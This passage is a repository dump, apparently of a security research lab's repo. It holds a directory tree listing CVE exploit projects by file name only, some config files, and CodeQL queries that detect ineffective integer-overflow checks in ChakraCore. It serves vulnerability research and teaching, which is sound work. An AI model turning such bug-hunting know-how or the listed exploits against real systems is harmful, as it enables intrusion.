├── .github
└── ISSUE_TEMPLATE
│ ├── config.yml
│ └── wall-of-fame.yml
├── .gitignore
├── .gitmodules
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── CodeQL_Queries
├── .gitignore
├── actions
│ └── README.md
├── cpp
│ ├── .project
│ ├── .qlpath
│ ├── ChakraCore-bad-overflow-check
│ │ ├── BadOverflowCheck.ql
│ │ ├── README.md
│ │ └── steps
│ │ │ ├── 01_overflow_checks.ql
│ │ │ ├── 02_var_size.ql
│ │ │ └── 03_bad_overflow_check.ql
│ ├── Chrome
│ │ ├── README.md
│ │ ├── bindings.qll
│ │ ├── callback_tracking.qll
│ │ ├── callbacks.qll
│ │ ├── collections.qll
│ │ ├── common.qll
│ │ ├── field.qll
│ │ ├── object_lifetime
│ │ │ ├── lifetime_management.qll
│ │ │ └── obj_lifetime.qll
│ │ ├── pointers
│ │ │ ├── managed_ptr.qll
│ │ │ └── raw_ptr.qll
│ │ ├── qlpack.yml
│ │ └── queries
│ │ │ ├── README.md
│ │ │ ├── callback_unretained.ql
│ │ │ ├── callback_unretained_field.ql
│ │ │ ├── no_cleanup.ql
│ │ │ └── non_trivial_cleanup.ql
│ ├── Facebook_Fizz_CVE-2019-3560
│ │ ├── FizzOverflow.ql
│ │ ├── NarrowingConversions.ql
│ │ └── README.md
│ ├── MinIntNegate
│ │ ├── .gitignore
│ │ ├── 00_MinIntNegate.ql
│ │ ├── 01_MinIntNegate.ql
│ │ ├── 02_MinIntNegate.ql
│ │ ├── 03_MinIntNegate.ql
│ │ ├── 04_MinIntNegate.ql
│ │ ├── 05_MinIntNegate.ql
│ │ ├── 06_MinIntNegate.ql
│ │ ├── 07_MinIntNegate.ql
│ │ ├── README.md
│ │ └── test.cpp
│ ├── OpenSSL-hostname-validation
│ │ ├── BoostAsioMissingVerifyCallback.ql
│ │ ├── OpenSSLMissingVerifyCallback.ql
│ │ ├── OpenSSLPreverifyIgnored.ql
│ │ ├── OpenSSLVerify.qll
│ │ └── README.md
│ ├── Qualcomm-MSM-copy_from_user
│ │ ├── 00_copy_from_user.ql
│ │ ├── 01_copy_from_user_annotated.ql
│ │ ├── 02_filter_with_upperbound.ql
│ │ ├── 03_filter_with_upperbound.ql
│ │ ├── 04_safe_malloc.ql
│ │ ├── 05_filter_with_upperbound_and_safe_malloc.ql
│ │ ├── 06_stackaddress_dataflow.ql
│ │ └── README.md
│ ├── README.md
│ ├── XNU_DTrace_CVE-2017-13782
│ │ ├── DTraceUnsafeIndex.ql
│ │ └── README.md
│ ├── XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160
│ │ ├── BCopyNegativeSize.ql
│ │ └── README.md
│ ├── XNU_icmp_error_CVE-2018-4407
│ │ ├── 00_mbuf_copydata_tainted_size.ql
│ │ ├── 01_paths_to_icmp_error.ql
│ │ ├── 02_paths_to_icmp_error.ql
│ │ ├── 03_paths_to_icmp_error.ql
│ │ └── README.md
│ ├── XNU_packet-mangler_CVE-2018-4249
│ │ ├── ArrayIndexMightOverflow.ql
│ │ ├── InfiniteLoop.ql
│ │ ├── README.md
│ │ └── tcphdr_mbuf_copydata.ql
│ ├── libjpeg-turbo-oob
│ │ ├── 01_find_colormap_index.ql
│ │ ├── 02a_find_guarded_colormap_index.ql
│ │ ├── 02b_find_guarded_colormap_index_working.ql
│ │ ├── 03_find_unguarded_colormap_index.ql
│ │ ├── 04_find_unguarded_colormap_no_fps.ql
│ │ ├── 05_find_unguarded_colormap_generalised.ql
│ │ └── README.md
│ ├── libssh2_eating_error_codes
│ │ ├── 00_error_codes.ql
│ │ ├── 01_error_codes_call.ql
│ │ ├── 02_eating_error_codes.ql
│ │ ├── 03_eating_error_codes_localflow.ql
│ │ ├── 04_eating_error_codes_localflow_rangeanalysis.ql
│ │ └── README.md
│ ├── qlpack.yml
│ ├── queries.xml
│ ├── rsyslog_CVE-2018-1000140
│ │ ├── 01_find_snprintf.ql
│ │ ├── 02_find_snprintf_with_result.ql
│ │ ├── 03_find_snprintf_with_result_and_string.ql
│ │ ├── 04_find_snprintf_with_result_and_string_and_local_taint.ql
│ │ ├── 05_find_snprintf_with_result_and_string_and_local_taint_ub.ql
│ │ ├── README.md
│ │ └── Video
│ │ │ ├── README.md
│ │ │ └── rsyslog.srt
│ └── rsyslog_CVE-2019-17041
│ │ ├── 01_find_data_input.ql
│ │ ├── 02_find_data_pointer_usage.ql
│ │ ├── 03_find_data_pointer_usage_extended.ql
│ │ ├── 04_find_parsers.ql
│ │ ├── 05_find_tainted_iterations.ql
│ │ └── README.md
├── csharp
│ ├── .project
│ ├── .qlpath
│ ├── TelerikRepeatedEncryptionKey
│ │ ├── README.md
│ │ └── TelerikRepeatedEncryptionKey.ql
│ ├── ZipSlip
│ │ ├── 01_Sources.ql
│ │ ├── 02_Sources.ql
│ │ ├── 03_Sinks.ql
│ │ ├── 04_SinkArgument.ql
│ │ ├── 05_LocalFlow.ql
│ │ ├── 06_GlobalFlow.ql
│ │ └── README.md
│ ├── qlpack.yml
│ └── queries.xml
├── java
│ ├── .project
│ ├── .qlpath
│ ├── Apache_Struts_CVE-2017-9805
│ │ ├── README.md
│ │ ├── UnsafeDeserialization.qll
│ │ └── UnsafeDeserializationStruts.ql
│ ├── Apache_Struts_CVE-2018-11776
│ │ ├── 01_compileAndExecute.ql
│ │ ├── 02_compileAndExecute.ql
│ │ ├── 03_compileAndExecute.ql
│ │ ├── 04_compileAndExecute.ql
│ │ ├── 05_getNamespace.ql
│ │ ├── 06_getNamespace.ql
│ │ ├── 07_getNamespace.ql
│ │ ├── 08_getNamespace.ql
│ │ ├── 09_dataflow.ql
│ │ ├── 10_dataflow_with_barrier.ql
│ │ ├── 11_dataflow_with_additional_flow_step.ql
│ │ └── README.md
│ ├── qlpack.yml
│ └── queries.xml
└── javascript
│ ├── .project
│ ├── .qlpath
│ ├── Etherpad_CVE-2018-6835
│ ├── 01_HTTP_handlers.ql
│ ├── 02_getASendMethodCall.ql
│ ├── 03_LikelySendArgument.ql
│ ├── 04_LikelyRequestParameter.ql
│ ├── 05_DataFlow.ql
│ ├── 06_DataFlow_With_Sanitizer.ql
│ ├── README.md
│ └── alternative
│ │ ├── 01_ReflectedXss.ql
│ │ ├── 02_SwaggerRouteHandler.ql
│ │ ├── 03_ResponseSendArgument.ql
│ │ ├── 04_ResponseSendAccess.ql
│ │ ├── 05_ResponseSendArgumentWithAliasing.ql
│ │ ├── 06_ReflectedXss.ql
│ │ ├── 07_ReflectedXssWithSanitizer.ql
│ │ └── README.md
│ ├── qlpack.yml
│ └── queries.xml
├── Conferences
└── 2020
│ ├── H-CON
│ └── HC0N.pdf
│ ├── OffensiveCon
│ ├── cant-grep-this.pdf
│ └── exercises
│ │ ├── dataflow
│ │ ├── ex0.ql
│ │ ├── ex1.ql
│ │ └── ex2.ql
│ │ ├── functions
│ │ ├── ex0.ql
│ │ ├── ex1.ql
│ │ └── ex2.ql
│ │ ├── quantifiers
│ │ ├── ex0.ql
│ │ ├── ex1.ql
│ │ └── ex2.ql
│ │ ├── tainttracking
│ │ └── ex0.ql
│ │ ├── testcase
│ │ ├── ex0.ql
│ │ ├── ex1.ql
│ │ ├── ex2.ql
│ │ ├── ex3.ql
│ │ ├── ex4.ql
│ │ ├── ex5.ql
│ │ ├── ex6.ql
│ │ ├── ex7.ql
│ │ └── ex8.ql
│ │ ├── types
│ │ ├── ex0.ql
│ │ ├── ex1.ql
│ │ ├── ex2.ql
│ │ ├── ex3.ql
│ │ ├── ex4.ql
│ │ └── ex5.ql
│ │ └── variables
│ │ ├── ex0.ql
│ │ ├── ex1.ql
│ │ ├── ex2.ql
│ │ ├── ex3.ql
│ │ ├── ex4.ql
│ │ ├── ex5.ql
│ │ └── ex6.ql
│ └── RootedCON
│ └── Presentacion.pdf
├── Fuzzing
└── GStreamer
│ ├── README.md
│ ├── aux.h
│ ├── labeler
│ ├── MP4.cc
│ ├── MP4.h
│ ├── fourcc.h
│ └── labeler.h
│ ├── main.cc
│ ├── makefile
│ ├── tree.cc
│ └── tree.h
├── LICENSE.md
├── Meetup
├── 2019-11
│ ├── README.md
│ └── presentations
│ │ ├── Bug hunting with CodeQL.pdf
│ │ └── Newbie fuzzing gains.pdf
├── 2020-01
│ ├── Breaking-SAML-dotNet-Edition.pdf
│ ├── Hunting-Backdoors-in-Open-Source.pdf
│ ├── No-More-Whack-A-Mole.pdf
│ └── README.md
└── 2020-04
│ ├── Managing-content-security-and-samesite-cookies.pdf
│ ├── README.md
│ ├── ThreatModelDevOps-GitHubSecMeetup.pdf
│ └── inql.pdf
├── README.md
├── SecurityExploits
├── Android
│ ├── Mali
│ │ ├── CVE-2025-0072
│ │ │ ├── README.md
│ │ │ ├── firmware_offsets.h
│ │ │ ├── log_utils.h
│ │ │ ├── mali_base_common_kernel.h
│ │ │ ├── mali_base_csf_kernel.h
│ │ │ ├── mali_base_kernel.h
│ │ │ ├── mali_kbase_csf_ioctl.h
│ │ │ ├── mali_kbase_ioctl.h
│ │ │ ├── mali_userio.c
│ │ │ ├── mem_read_write.c
│ │ │ ├── mem_read_write.h
│ │ │ ├── mempool_utils.c
│ │ │ └── mempool_utils.h
│ │ ├── CVE_2022_20186
│ │ │ ├── README.md
│ │ │ ├── mali.h
│ │ │ ├── mali_alias.c
│ │ │ ├── mali_base_jm_kernel.h
│ │ │ └── midgard.h
│ │ ├── CVE_2022_38181
│ │ │ ├── README.md
│ │ │ ├── hello-jni2.c
│ │ │ ├── mali.h
│ │ │ ├── mali_base_jm_kernel.h
│ │ │ ├── mali_shrinker_mmap.c
│ │ │ └── midgard.h
│ │ ├── CVE_2022_46395
│ │ │ ├── README.md
│ │ │ ├── log_utils.h
│ │ │ ├── mali.h
│ │ │ ├── mali_base_jm_kernel.h
│ │ │ ├── mali_user_buf.c
│ │ │ ├── mem_write.c
│ │ │ ├── mem_write.h
│ │ │ ├── mempool_utils.c
│ │ │ ├── mempool_utils.h
│ │ │ └── midgard.h
│ │ ├── CVE_2023_6241
│ │ │ ├── README.md
│ │ │ ├── firmware_offsets.h
│ │ │ ├── log_utils.h
│ │ │ ├── mali_base_common_kernel.h
│ │ │ ├── mali_base_csf_kernel.h
│ │ │ ├── mali_base_kernel.h
│ │ │ ├── mali_jit_csf.c
│ │ │ ├── mali_kbase_csf_ioctl.h
│ │ │ ├── mali_kbase_ioctl.h
│ │ │ ├── mem_read_write.c
│ │ │ ├── mem_read_write.h
│ │ │ ├── mempool_utils.c
│ │ │ └── mempool_utils.h
│ │ └── GHSL-2023-005
│ │ │ ├── README.md
│ │ │ ├── mali.h
│ │ │ ├── mali_base_jm_kernel.h
│ │ │ ├── mali_jit.c
│ │ │ └── midgard.h
│ └── Qualcomm
│ │ ├── CVE-2020-11239
│ │ ├── README.md
│ │ ├── kgsl_exploit.h
│ │ └── kgsl_exploit_slab_a71.c
│ │ ├── CVE-2022-22057
│ │ ├── README.md
│ │ ├── addr_utils.h
│ │ ├── cpu_utils.c
│ │ ├── cpu_utils.h
│ │ ├── fake_obj_util.c
│ │ ├── fake_obj_util.h
│ │ ├── ion_utils.c
│ │ ├── ion_utils.h
│ │ ├── kgsl_ioctl.h
│ │ ├── sendmsg_spray.c
│ │ ├── sendmsg_spray.h
│ │ ├── signalfd_spray.c
│ │ ├── signalfd_spray.h
│ │ ├── timeline_wait.c
│ │ ├── work_queue_utils.c
│ │ └── work_queue_utils.h
│ │ ├── CVE_2022_25664
│ │ ├── README.md
│ │ ├── adreno_kernel
│ │ │ ├── adreno_cmd.c
│ │ │ ├── adreno_cmd.h
│ │ │ ├── adreno_kernel.c
│ │ │ ├── dma_search.h
│ │ │ ├── kgsl_utils.c
│ │ │ └── kgsl_utils.h
│ │ └── adreno_user
│ │ │ ├── adreno.h
│ │ │ └── adreno_user.c
│ │ └── NPU
│ │ ├── README.md
│ │ ├── bpf_tools.h
│ │ ├── npu_shell.c
│ │ ├── npu_shell.h
│ │ ├── sendmsg_spray.c
│ │ └── sendmsg_spray.h
├── Ansible
│ └── fetch_CVE-2019-3828
│ │ ├── README.md
│ │ ├── server
│ │ ├── Dockerfile
│ │ └── home
│ │ │ ├── .ssh
│ │ │ └── authorized_keys
│ │ │ └── scripts
│ │ │ ├── bashrc
│ │ │ └── enable_exploit.sh
│ │ └── zeuss
│ │ ├── Dockerfile
│ │ └── home
│ │ ├── .ssh
│ │ ├── id_ed25519
│ │ └── id_ed25519.pub
│ │ └── config
│ │ ├── ansible.cfg
│ │ ├── inventory.d
│ │ └── inventory
│ │ └── myfetch.yml
├── Apache
│ └── Struts
│ │ └── CVE-2018-11776
│ │ ├── README.md
│ │ ├── struts-attacker
│ │ ├── Dockerfile
│ │ └── src
│ │ │ ├── Makefile
│ │ │ ├── copykey.c
│ │ │ ├── startcalc.c
│ │ │ ├── utils.c
│ │ │ └── utils.h
│ │ └── struts-server
│ │ ├── Dockerfile
│ │ └── struts-actionchaining.xml
├── CImg
│ ├── Dockerfile
│ ├── README.md
│ └── poc.c
├── Chrome
│ ├── SandboxEscape
│ │ ├── CVE-2021-30528
│ │ │ ├── README.md
│ │ │ ├── aarch64
│ │ │ │ ├── README.md
│ │ │ │ ├── arm64_renderer.patch
│ │ │ │ ├── browser.patch
│ │ │ │ ├── trigger.html
│ │ │ │ └── trigger2_64.html
│ │ │ ├── arm
│ │ │ │ ├── README.md
│ │ │ │ ├── arm_renderer.patch
│ │ │ │ ├── browser.patch
│ │ │ │ ├── trigger.html
│ │ │ │ └── trigger2_88.html
│ │ │ └── copy_mojo_js_bindings.py
│ │ └── GHSL-2020-165
│ │ │ ├── README.md
│ │ │ ├── copy_mojo_js_bindings.py
│ │ │ ├── payment_request_clip.html
│ │ │ ├── payment_request_clip2.html
│ │ │ ├── payment_request_jam_clip.html
│ │ │ └── sbx.patch
│ ├── blink
│ │ ├── CVE-2020-15972
│ │ │ ├── README.md
│ │ │ ├── out2.mp3
│ │ │ ├── tear-down.js
│ │ │ ├── tear_down2.html
│ │ │ ├── tear_down2_virtual.html
│ │ │ └── tear_down_android_rce_release.html
│ │ └── CVE-2020-6449
│ │ │ ├── README.md
│ │ │ ├── delay-processor.js
│ │ │ ├── finished_delay_release.html
│ │ │ ├── finished_delay_release2.html
│ │ │ ├── test-processor.js
│ │ │ └── test-processor2.js
│ └── v8
│ │ ├── CVE-2021-30632
│ │ ├── README.md
│ │ └── poc.js
│ │ ├── CVE-2021-37975
│ │ ├── README.md
│ │ ├── chrome_poc_child.html
│ │ ├── chrome_poc_parent.html
│ │ └── poc.js
│ │ ├── CVE_2022_1134
│ │ ├── README.md
│ │ └── superic_rce.html
│ │ ├── CVE_2023_3420
│ │ ├── README.md
│ │ └── poc.js
│ │ ├── CVE_2023_4069
│ │ ├── README.md
│ │ └── poc.js
│ │ ├── CVE_2024_3833
│ │ ├── README.md
│ │ ├── import_shell.js
│ │ ├── trial-token.patch
│ │ └── wasm_poc.html
│ │ └── CVE_2024_5830
│ │ ├── README.md
│ │ └── calc.html
├── Facebook
│ └── Fizz
│ │ └── CVE-2019-3560
│ │ ├── README.md
│ │ ├── attacker
│ │ ├── Dockerfile
│ │ └── home
│ │ │ ├── diff.txt
│ │ │ └── poc
│ │ │ ├── Makefile
│ │ │ └── poc.c
│ │ └── server
│ │ ├── Dockerfile
│ │ └── home
│ │ └── certs
│ │ ├── ca.config
│ │ ├── clean.sh
│ │ ├── create-certs.sh
│ │ └── server.config
├── Microsoft
│ └── ChakraCore
│ │ └── CVE-2017-0141
│ │ ├── README.md
│ │ └── cve-2017-0141.js
├── README.md
├── SANE
│ └── epsonds_CVE-2020-12861
│ │ ├── .gitignore
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── fakescanner.cpp
│ │ ├── glibc_heap_exploit_demos
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ └── home
│ │ │ ├── .gitignore
│ │ │ ├── .tmux.conf
│ │ │ ├── 01_chunk_layout.c
│ │ │ ├── 02_arithmetic_with_top.c
│ │ │ ├── 03_overlap_top_chunk.c
│ │ │ ├── 04_A_fastbin_reverse_into_tcache.c
│ │ │ ├── 04_B_fastbin_reverse_into_tcache.c
│ │ │ ├── 05_shrink_tcache_chunk.c
│ │ │ └── Makefile
│ │ ├── sane_backends_exploit.cpp
│ │ ├── utils.cpp
│ │ └── utils.hpp
├── Ubuntu
│ ├── Apport_TOCTOU_get_ignore_dom_CVE-2019-7307
│ │ ├── .gitignore
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── README_CVE-2019-11476.md
│ │ ├── README_CVE-2019-11481.md
│ │ ├── README_CVE-2019-11484.md
│ │ ├── README_CVE-2019-15790.md
│ │ ├── README_CVE-2019-7307.md
│ │ ├── encoding.c
│ │ ├── encoding.h
│ │ ├── gencrashreport.cpp
│ │ ├── killwhoopsie1.cpp
│ │ ├── killwhoopsie2.cpp
│ │ ├── load_crash_report.cpp
│ │ ├── load_crash_report.hpp
│ │ ├── memory_dumps
│ │ │ ├── README.md
│ │ │ ├── home1.txt
│ │ │ ├── home2.txt
│ │ │ ├── home3.txt
│ │ │ ├── home4.txt
│ │ │ ├── work1.txt
│ │ │ ├── work2.txt
│ │ │ ├── work3.txt
│ │ │ └── work4.txt
│ │ ├── restart_whoopsie.cpp
│ │ ├── segv.c
│ │ ├── utils.cpp
│ │ ├── utils.hpp
│ │ ├── whoopsie_exploit.cpp
│ │ └── whoopsie_exploit.hpp
│ └── accountsservice_CVE-2021-3939
│ │ ├── .gitignore
│ │ ├── CMakeLists.txt
│ │ ├── README-build-accountsservice.md
│ │ ├── README.md
│ │ ├── observations
│ │ ├── info.txt
│ │ ├── instrumentation.md
│ │ └── polkit_sequence.txt
│ │ ├── poc.cpp
│ │ ├── poc2.cpp
│ │ └── poc3.cpp
├── apple
│ └── darwin-xnu
│ │ ├── DTrace
│ │ └── CVE-2017-13782
│ │ │ ├── README.md
│ │ │ └── cve-2017-13782-poc.c
│ │ ├── icmp_error_CVE-2018-4407
│ │ ├── .gitignore
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── crash_all.c
│ │ ├── direct_attack.c
│ │ ├── send_packet.c
│ │ ├── send_packet.h
│ │ ├── utils.c
│ │ └── utils.h
│ │ ├── nfs_vfsops_CVE-2018-4259
│ │ ├── .gitignore
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── kevfs.c
│ │ └── nfs.x
│ │ └── packet_mangler_CVE-2017-13904
│ │ ├── README.md
│ │ └── cve-2017-13904-poc.c
├── freedesktop
│ └── DBus-CVE-2020-12049
│ │ ├── .gitignore
│ │ ├── Makefile
│ │ ├── README.md
│ │ └── fd_dos.cpp
├── kafkaui
│ └── compose.yml
├── libcue
│ └── track_set_index_CVE-2023-43641
│ │ ├── .gitignore
│ │ ├── CVE-2023-43641-poc-simple.cue
│ │ ├── Makefile
│ │ ├── README.md
│ │ ├── fedora38.cue
│ │ ├── lunar.cue
│ │ ├── mkcue.cpp
│ │ ├── search-bar-screenshot.png
│ │ ├── utils.cpp
│ │ └── utils.h
├── libssh
│ └── pubkey-auth-bypass-CVE-2023-2283
│ │ ├── README.md
│ │ ├── attacker
│ │ ├── Dockerfile
│ │ └── home
│ │ │ ├── .bash_history
│ │ │ ├── .tmux.conf
│ │ │ ├── diff.txt
│ │ │ ├── id_ed25519.pub
│ │ │ └── id_rsa.pub
│ │ └── server
│ │ ├── Dockerfile
│ │ └── home
│ │ ├── .bash_history
│ │ ├── .ssh
│ │ ├── authorized_keys
│ │ ├── id_ed25519.pub
│ │ └── id_rsa.pub
│ │ └── .tmux.conf
├── libssh2
│ ├── out_of_bounds_read_disconnect_CVE-2019-17498
│ │ ├── README.md
│ │ ├── client
│ │ │ ├── Dockerfile
│ │ │ └── home
│ │ │ │ └── .tmux.conf
│ │ └── server
│ │ │ ├── Dockerfile
│ │ │ └── home
│ │ │ ├── .tmux.conf
│ │ │ └── poc.bin
│ └── out_of_bounds_read_kex_CVE-2019-13115
│ │ ├── README.md
│ │ ├── client
│ │ ├── Dockerfile
│ │ └── home
│ │ │ └── .tmux.conf
│ │ └── server
│ │ ├── Dockerfile
│ │ └── home
│ │ ├── .tmux.conf
│ │ └── diff.txt
├── polkit
│ ├── authentication_bypass_CVE-2021-3560
│ │ ├── .gitignore
│ │ ├── CMakeLists.txt
│ │ ├── README.md
│ │ ├── createuser.cpp
│ │ └── installpackage.cpp
│ └── file_descriptor_exhaustion_CVE-2021-4115
│ │ ├── .gitignore
│ │ ├── CMakeLists.txt
│ │ ├── README.md
│ │ └── locksessions.cpp
├── rsyslog
│ └── CVE-2018-1000140_snprintf_librelp
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ ├── benevolent
│ │ ├── certs
│ │ │ ├── ca.config
│ │ │ ├── clean.sh
│ │ │ ├── client.config
│ │ │ ├── create-certs.sh
│ │ │ └── server.config
│ │ ├── rsyslog-client.conf
│ │ └── rsyslog-server.conf
│ │ ├── build-all.sh
│ │ └── malicious
│ │ ├── kevcertz
│ │ ├── clean.sh
│ │ ├── client.config
│ │ └── create-certz.sh
│ │ └── rsyslog-client.conf
├── strongSwan
│ └── CVE-2018-5388
│ │ ├── Dockerfile
│ │ ├── README.md
│ │ └── stroke_patch.txt
└── vivo-project
│ └── CVE-2019-6986
│ ├── README.md
│ ├── vivo-attacker
│ ├── Dockerfile
│ └── post.sh
│ └── vivo-server
│ ├── Dockerfile
│ └── init_mysql.sh
├── docs
└── report-template.md
└── mastodon
└── verifications.html
/.github/ISSUE_TEMPLATE/config.yml:
--------------------------------------------------------------------------------
1 | blank_issues_enabled: false
2 | contact_links:
3 | - name: CodeQL Feedback
4 | url: https://github.com/github/securitylab/discussions/new
5 | about: Feedback related to the CodeQL CLI, languages, libraries, documentation, etc.
6 | - name: Questions about the CodeQL language
7 | url: https://github.com/github/securitylab/discussions/new
8 | about: Questions about any of the CodeQL query languages.
9 |
10 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | .DS_Store
2 | *~
3 | /.metadata/
4 | .vscode
5 | .cache
6 | .venv
7 |
8 | # Ignore any generated TypeScript -> JavaScript files
9 | .github/actions/replicate-issue/*.js
10 |
11 | # Logs
12 | logs
13 | *.log
14 | npm-debug.log*
15 |
16 | # Dependency directories
17 | node_modules/
18 |
19 | # Typescript v1 declaration files
20 | typings/
21 |
22 | # Optional npm cache directory
23 | .npm
24 |
25 | # Optional eslint cache
26 | .eslintcache
27 |
28 | # Typescript debugging
29 | **/*.js.map
30 |
--------------------------------------------------------------------------------
/.gitmodules:
--------------------------------------------------------------------------------
1 | [submodule "SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse"]
2 | path = SecurityExploits/polkit/authentication_bypass_CVE-2021-3560/DBusParse
3 | url = https://github.com/kevinbackhouse/DBusParse.git
4 | [submodule "SecurityExploits/Ubuntu/GHSL-2021-1011-accountsservice/DBusParse"]
5 | path = SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/DBusParse
6 | url = https://github.com/kevinbackhouse/DBusParse.git
7 | [submodule "SecurityExploits/Ubuntu/GHSL-2021-1011-accountsservice/EPollLoop"]
8 | path = SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoop
9 | url = https://github.com/kevinbackhouse/EPollLoop.git
10 | [submodule "SecurityExploits/Ubuntu/GHSL-2021-1011-accountsservice/EPollLoopDBusHandler"]
11 | path = SecurityExploits/Ubuntu/accountsservice_CVE-2021-3939/EPollLoopDBusHandler
12 | url = https://github.com/kevinbackhouse/EPollLoopDBusHandler.git
13 | [submodule "SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115/DBusParse"]
14 | path = SecurityExploits/polkit/file_descriptor_exhaustion_CVE-2021-4115/DBusParse
15 | url = https://github.com/kevinbackhouse/DBusParse
16 |
--------------------------------------------------------------------------------
/CONTRIBUTING.md:
--------------------------------------------------------------------------------
1 | ## Contributing
2 |
3 | [fork]: https://github.com/github/vscode-codeql/fork
4 | [pr]: https://github.com/github/vscode-codeql/compare
5 | [style]: https://primer.style
6 | [code-of-conduct]: CODE_OF_CONDUCT.md
7 |
8 | Hi there! We're thrilled that you'd like to contribute to this project. Your help is essential for keeping it great.
9 |
10 | Contributions to this project are [released](https://help.github.com/articles/github-terms-of-service/#6-contributions-under-repository-license) to the public under the [project's open source license](LICENSE.md).
11 |
12 | Please note that this project is released with a [Contributor Code of Conduct][code-of-conduct]. By participating in this project you agree to abide by its terms.
13 |
14 | ## Submitting a pull request
15 |
16 | 0. [Fork][fork] and clone the repository
17 | 0. Set up a local build
18 | 0. Create a new branch: `git checkout -b my-branch-name`
19 | 0. Make your change
20 | 0. Push to your fork and [submit a pull request][pr]
21 | 0. Pat yourself on the back and wait for your pull request to be reviewed and merged.
22 |
23 | ## Resources
24 |
25 | - [How to Contribute to Open Source](https://opensource.guide/how-to-contribute/)
26 | - [Using Pull Requests](https://help.github.com/articles/about-pull-requests/)
27 | - [GitHub Help](https://help.github.com)
28 |
--------------------------------------------------------------------------------
/CodeQL_Queries/.gitignore:
--------------------------------------------------------------------------------
1 | *.cache
2 |
--------------------------------------------------------------------------------
/CodeQL_Queries/actions/README.md:
--------------------------------------------------------------------------------
1 | The queries were merged into [CodeQL repository](https://github.com/github/codeql/tree/main/javascript/ql/src/experimental/Security/CWE-094).
2 | Read more about the research on [https://securitylab.github.com/research/github-actions-untrusted-input](https://securitylab.github.com/research/github-actions-untrusted-input).
3 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/.project:
--------------------------------------------------------------------------------
1 |
2 |
3 | ql-demos-cpp
4 |
5 |
6 |
7 |
8 |
9 |
10 | com.semmle.plugin.qdt.core.qlnature
11 |
12 |
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/.qlpath:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | com.semmle.code.cpp.library
5 |
6 | com.semmle.code.cpp.dbscheme
7 |
8 | cpp
9 |
10 |
11 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/BadOverflowCheck.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/**
 * Holds if the static type of `e` occupies fewer than 4 bytes, i.e. it is
 * narrower than the usual 4-byte `int` (for example `int8_t` or `uint16_t`).
 */
predicate isSmall(Expr e) {
  exists(int size | size = e.getType().getSize() | size < 4)
}
6 |
// Flag comparisons of the shape `v < v + x` (any relational operator, either
// operand order) in which both addends are narrower than 4 bytes while the
// addition itself is evaluated at a wider type. Such a check is ineffective:
// the narrow operands are widened before the addition, so the sum never wraps
// and the comparison cannot observe the overflow it was written to detect.
from AddExpr add, Variable v, RelationalOperation compare
where
  add.getAnOperand() = v.getAnAccess() and
  compare.getAnOperand() = add and
  compare.getAnOperand() = v.getAnAccess() and
  // both addends are narrow ...
  isSmall(add.getLeftOperand()) and
  isSmall(add.getRightOperand()) and
  // ... but the (explicitly converted) sum is not, so no wrap-around can occur
  not isSmall(add.getExplicitlyConverted())
select compare, "Bad overflow check"
14 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/README.md:
--------------------------------------------------------------------------------
1 | Use [this snapshot](https://github.com/github/securitylab/releases/download/chakracore-codeql-database/ChakraCore-revision-2017-April-12--18-13-26.zip)
2 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/steps/01_overflow_checks.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/**
 * Holds if `compare` is a relational comparison (`<`, `<=`, `>`, `>=`) of the
 * shape `var < var + ???`, in either operand order: one operand of `compare`
 * is an access of `var`, the other is the addition `add`, and `add` in turn has
 * an access of `var` as one of its operands.
 */
predicate overflowCheck(LocalScopeVariable var, AddExpr add, RelationalOperation compare) {
  exists(VariableAccess access | access = var.getAnAccess() |
    compare.getAnOperand() = access and compare.getAnOperand() = add
  ) and
  add.getAnOperand() = var.getAnAccess()
}
9 |
// Step 1: list every `var < var + ???` check together with the declared type
// of `var`, without yet deciding whether the check is sound.
from LocalScopeVariable var, AddExpr add
where exists(RelationalOperation compare | overflowCheck(var, add, compare))
select add, "Overflow check on variable of type " + var.getUnderlyingType()
13 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/steps/02_var_size.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/**
 * Holds if `compare` is a relational comparison (`<`, `<=`, `>`, `>=`) of the
 * shape `var < var + ???`, in either operand order: one operand of `compare`
 * is an access of `var`, the other is the addition `add`, and `add` in turn has
 * an access of `var` as one of its operands.
 */
predicate overflowCheck(LocalScopeVariable var, AddExpr add, RelationalOperation compare) {
  exists(VariableAccess access | access = var.getAnAccess() |
    compare.getAnOperand() = access and compare.getAnOperand() = add
  ) and
  add.getAnOperand() = var.getAnAccess()
}
9 |
// Step 2: keep only the checks whose variable is narrower than 4 bytes, the
// case in which the addition may be evaluated at a wider type than `var`.
from LocalScopeVariable var, AddExpr add
where
  exists(RelationalOperation compare | overflowCheck(var, add, compare)) and
  var.getType().getSize() < 4
select add, "Overflow check on variable of type " + var.getUnderlyingType()
14 |
--------------------------------------------------------------------------------
/CodeQL_Queries/cpp/ChakraCore-bad-overflow-check/steps/03_bad_overflow_check.ql:
--------------------------------------------------------------------------------
1 | import cpp
2 |
/**
 * Holds if `compare` is a relational comparison (`<`, `<=`, `>`, `>=`) of the
 * shape `var < var + ???`, in either operand order: one operand of `compare`
 * is an access of `var`, the other is the addition `add`, and `add` in turn has
 * an access of `var` as one of its operands.
 */
predicate overflowCheck(LocalScopeVariable var, AddExpr add, RelationalOperation compare) {
  exists(VariableAccess access | access = var.getAnAccess() |
